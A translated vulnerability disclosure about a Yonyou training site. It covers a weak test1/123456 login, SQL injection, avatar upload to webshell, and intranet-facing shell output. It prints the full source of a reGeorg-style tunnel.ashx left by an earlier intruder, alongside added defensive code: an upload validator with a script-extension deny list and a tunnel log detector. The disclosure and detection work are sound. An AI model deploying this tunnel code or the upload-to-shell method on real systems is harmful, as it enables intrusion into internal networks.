From a weak password to getshell on a Yonyou site (can be used to go deeper into the intranet; traces of a previous intruder found)
1. A site without a CAPTCHA on its login form: a simple test yielded an account: http://lexue.yonyou.com  test1/123456
2. A SQL injection: after logging in, a simple test of the site turned up one error-based injection:
It was not tested any further; there are probably more injection points, please check them yourselves!
3. Arbitrary file upload in the profile avatar
Testing showed that uploading an ordinary China Chopper (菜刀) shell produced an error: the aspx was not parsed normally.
After uploading, the full upload path can be obtained by capturing the request:
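The avatar upload in section 3 accepts any file and then reveals where it was stored. As an added example (not code from the report or from the site), here is a server-side check of the kind that closes that hole: size limit, extension allow-list, rejection of a server-side script extension anywhere in the client name (so names such as shell.aspx;.png are refused), a magic-byte check that the bytes really are the claimed image type, and a random storage name so the client name is never used. Function names, limits and the helper check_avatar are assumptions of this example.

```python
"""Hardened avatar-upload check (added example; names and limits are assumed)."""
import os
import re
import secrets

# Extensions accepted for an avatar and the file signatures each may begin with.
ALLOWED = {
    ".png": [b"\x89PNG\r\n\x1a\n"],
    ".jpg": [b"\xff\xd8\xff"],
    ".jpeg": [b"\xff\xd8\xff"],
    ".gif": [b"GIF87a", b"GIF89a"],
}
MAX_BYTES = 2 * 1024 * 1024  # assumed size limit for an avatar

# Server-side script extensions that must not appear anywhere in the client
# name, followed by a non-word character or the end, so that
# "shell.aspx;.png" or "shell.ashx.png" are refused as well.
SCRIPT_EXT = re.compile(r"\.(asp|aspx|ashx|asmx|asa|cer|php\d?|jsp|jspx)(\W|$)", re.I)


class UploadRejected(ValueError):
    pass


def validate_avatar(filename: str, data: bytes) -> str:
    """Return a random storage name for an acceptable upload, else raise UploadRejected.

    Checks, in order: size, extension allow-list, no embedded script extension,
    and that the content starts with a signature matching the claimed type.
    """
    if len(data) == 0 or len(data) > MAX_BYTES:
        raise UploadRejected("empty or oversized upload")
    ext = os.path.splitext(filename.lower())[1]
    if ext not in ALLOWED:
        raise UploadRejected(f"extension {ext!r} not allowed")
    if SCRIPT_EXT.search(filename):
        raise UploadRejected("script extension embedded in filename")
    if not any(data.startswith(sig) for sig in ALLOWED[ext]):
        raise UploadRejected("content does not match claimed image type")
    # Never reuse the client-supplied name: a random name removes path tricks
    # and the stored location cannot be predicted from the upload response.
    return secrets.token_hex(16) + ext


def check_avatar(filename: str, data: bytes):
    """Convenience wrapper: ("accepted", storage_name) or ("rejected", reason)."""
    try:
        return ("accepted", validate_avatar(filename, data))
    except UploadRejected as exc:
        return ("rejected", str(exc))


if __name__ == "__main__":
    # Constructed sample inputs, not files from the report.
    png = b"\x89PNG\r\n\x1a\n" + b"\x00" * 64
    for name, blob in [("me.png", png), ("shell.aspx", b"<%@ Page %>"),
                       ("shell.aspx;.png", png), ("x.png", b"<%@ Page %>")]:
        print(name, check_avatar(name, blob))
```

Even with these checks, the upload tree must be served as static content only: if the web server is allowed to execute scripts under Upload\, a single missed case turns the directory into a shell host, which is exactly what section 4 finds.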
The server turned out to be connected to the internal network:
[*] 基本信息 [ A:\C:\D:\L:\ ]
D:\PX20150204\Website\Upload\PXSystem\default> whoami
nt authority\network service
D:\PX20150204\Website\UpLoad\PXSystem\default> nslookup yonyou.com
服务器:  bg-dc-01.ufsoft.com.cn
Address:  192.168.8.119
名称:    yonyou.com.com.cn
Address:  202.106.199.34
4. Traces of an intrusion: the same directory contains the file 20151002173504600358.aspx
The intrusion can therefore be dated to 2 October of last year. A privilege-escalation tool was also found:
Searching the directories turned up D:\PX20150204\Website\Upload\Log\tunnel.ashx
using System;
using System.Web;
using System.Net;
using System.Net.Sockets;

// The handler found at Upload\Log\tunnel.ashx. It is the server side of a
// reGeorg-style HTTP tunnel: every POST carries a cmd query parameter and the
// handler keeps one raw TCP socket per ASP.NET session, so the caller can open
// it (CONNECT), push bytes into it (FORWARD), pull bytes out of it (READ) and
// close it (DISCONNECT). Any other method returns the "Georg says" banner.
public class GenericHandler1 : IHttpHandler, System.Web.SessionState.IRequiresSessionState
{
    public void ProcessRequest (HttpContext context) {
        try
        {
            if (context.Request.HttpMethod == "POST")
            {
                String cmd = context.Request.QueryString.Get("cmd").ToUpper();
                if (cmd == "CONNECT")
                {
                    // Open a TCP connection to target:port and park it in the session.
                    try
                    {
                        String target = context.Request.QueryString.Get("target").ToUpper();
                        int port = int.Parse(context.Request.QueryString.Get("port"));
                        IPAddress ip = IPAddress.Parse(target);
                        System.Net.IPEndPoint remoteEP = new IPEndPoint(ip, port);
                        Socket sender = new Socket(AddressFamily.InterNetwork, SocketType.Stream, ProtocolType.Tcp);
                        sender.Connect(remoteEP);
                        sender.Blocking = false;
                        context.Session["socket"] = sender;
                        context.Response.AddHeader("X-STATUS", "OK");
                    }
                    catch (Exception ex)
                    {
                        context.Response.AddHeader("X-ERROR", ex.Message);
                        context.Response.AddHeader("X-STATUS", "FAIL");
                    }
                }
                else if (cmd == "DISCONNECT")
                {
                    // Close the session socket and drop the session.
                    try
                    {
                        Socket s = (Socket)context.Session["socket"];
                        s.Close();
                    }
                    catch (Exception ex)
                    {
                    }
                    context.Session.Abandon();
                    context.Response.AddHeader("X-STATUS", "OK");
                }
                else if (cmd == "FORWARD")
                {
                    // Relay the POST body into the session socket.
                    Socket s = (Socket)context.Session["socket"];
                    try
                    {
                        int buffLen = context.Request.ContentLength;
                        byte[] buff = new byte[buffLen];
                        int c = 0;
                        while ((c = context.Request.InputStream.Read(buff, 0, buff.Length)) > 0)
                        {
                            s.Send(buff);
                        }
                        context.Response.AddHeader("X-STATUS", "OK");
                    }
                    catch (Exception ex)
                    {
                        context.Response.AddHeader("X-ERROR", ex.Message);
                        context.Response.AddHeader("X-STATUS", "FAIL");
                    }
                }
                else if (cmd == "READ")
                {
                    // Drain whatever the non-blocking socket has pending into the response body.
                    Socket s = (Socket)context.Session["socket"];
                    try
                    {
                        int c = 0;
                        byte[] readBuff = new byte[512];
                        try
                        {
                            while ((c = s.Receive(readBuff)) > 0)
                            {
                                byte[] newBuff = new byte[c];
                                Array.ConstrainedCopy(readBuff, 0, newBuff, 0, c);
                                context.Response.BinaryWrite(newBuff);
                            }
                            context.Response.AddHeader("X-STATUS", "OK");
                        }
                        catch (SocketException soex)
                        {
                            // A would-block error on the non-blocking socket means no more data for now.
                            context.Response.AddHeader("X-STATUS", "OK");
                            return;
                        }
                    }
                    catch (Exception ex)
                    {
                        context.Response.AddHeader("X-ERROR", ex.Message);
                        context.Response.AddHeader("X-STATUS", "FAIL");
                    }
                }
            } else {
                context.Response.Write("Georg says, 'All seems fine'");
            }
        }
        catch (Exception exKak)
        {
            context.Response.AddHeader("X-ERROR", exKak.Message);
            context.Response.AddHeader("X-STATUS", "FAIL");
        }
    }

    public bool IsReusable {
        get {
            return false;
        }
    }
}
Judging by the timestamps, this file was created on 27 October of last year. The intruder probably uploaded it and hid it in the log directory to tunnel into the internal network, from where the intranet could be penetrated further. As the vendor had not given permission, no further penetration was carried out!
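For whoever has to clean this up, the two artifacts in section 4 leave distinct marks: the tunnel is a server-side script living under the upload tree, and its traffic is a stream of POSTs whose cmd parameter is one of CONNECT, DISCONNECT, FORWARD or READ. The following is an added example (not part of the report) of defender-side triage: it parses IIS W3C log text, flags requests that execute a script from the upload directory or carry a tunnel command, counts flagged requests per client, and checks a handler's source for the markers that the tunnel.ashx above carries ("Georg says", the X-STATUS and X-ERROR headers, IRequiresSessionState together with Socket use). The log lines, client addresses, the /Upload/ prefix and all function names are constructed assumptions of this example.

```python
"""Triage helpers for a reGeorg-style tunnel (added example; sample data is constructed)."""
import re
from collections import Counter

TUNNEL_CMDS = {"CONNECT", "DISCONNECT", "FORWARD", "READ"}
SCRIPT_EXTS = (".aspx", ".ashx", ".asmx", ".asp", ".asa")
UPLOAD_PREFIXES = ("/upload/",)  # assumed: only static files belong under here

# Strings present in the tunnel handler found on the server. Two or more of
# them together with a Socket reference is a strong indicator of the tunnel.
TUNNEL_MARKERS = (b"Georg says", b"X-STATUS", b"X-ERROR", b"IRequiresSessionState")


def parse_w3c(lines):
    """Yield one dict per request from IIS W3C extended log text."""
    fields = None
    for raw in lines:
        line = raw.strip()
        if not line:
            continue
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if line.startswith("#") or fields is None:
            continue
        values = line.split()
        if len(values) == len(fields):
            yield dict(zip(fields, values))


def flag_request(rec):
    """Return the reasons this request is suspicious (empty list if none)."""
    reasons = []
    stem = rec.get("cs-uri-stem", "").lower()
    if stem.endswith(SCRIPT_EXTS) and any(p in stem for p in UPLOAD_PREFIXES):
        reasons.append("server-side script executed from upload directory")
    query = rec.get("cs-uri-query", "-")
    m = re.search(r"(?:^|&)cmd=([A-Za-z]+)", query)
    if m and m.group(1).upper() in TUNNEL_CMDS:
        reasons.append("tunnel command " + m.group(1).upper())
    return reasons


def scan_log(text):
    """Run flag_request over a whole log and return the findings in log order."""
    findings = []
    for rec in parse_w3c(text.splitlines()):
        reasons = flag_request(rec)
        if reasons:
            findings.append({"time": rec.get("time"), "c-ip": rec.get("c-ip"),
                             "stem": rec.get("cs-uri-stem"), "reasons": reasons})
    return findings


def clients_by_hits(findings):
    """Count flagged requests per client address, most active first."""
    return Counter(f["c-ip"] for f in findings).most_common()


def looks_like_tunnel(source: bytes) -> bool:
    """True if a handler's source carries tunnel markers plus raw socket use."""
    hits = sum(1 for marker in TUNNEL_MARKERS if marker in source)
    return hits >= 2 and b"Socket" in source


# Constructed sample log, not taken from the report. Only the tunnel path
# matches the artifact; addresses are from documentation ranges.
SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 7.5
#Fields: date time cs-method cs-uri-stem cs-uri-query c-ip sc-status
2015-10-27 03:14:15 GET /PXSystem/default.aspx - 203.0.113.7 200
2015-10-27 03:14:20 POST /Upload/Log/tunnel.ashx - 203.0.113.7 200
2015-10-27 03:14:21 POST /Upload/Log/tunnel.ashx cmd=CONNECT&target=192.0.2.10&port=445 203.0.113.7 200
2015-10-27 03:14:22 POST /Upload/Log/tunnel.ashx cmd=FORWARD 203.0.113.7 200
2015-10-27 03:14:22 POST /Upload/Log/tunnel.ashx cmd=READ 203.0.113.7 200
2015-10-27 03:15:01 GET /Upload/Avatar/abc123.png - 198.51.100.4 200
"""

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f["time"], f["c-ip"], f["stem"], "; ".join(f["reasons"]))
    print(clients_by_hits(scan_log(SAMPLE_LOG)))
```

The first rule is the one that matters most: a .ashx or .aspx answering from the upload tree is a finding on its own, whatever the query string says, because the tunnel's CONNECT is the only command that has to be visible in the URL and the rest of the traffic is body-only POSTs. Pair the log check with a file-system sweep of the upload tree sorted by creation time, which is how the report dated both artifacts.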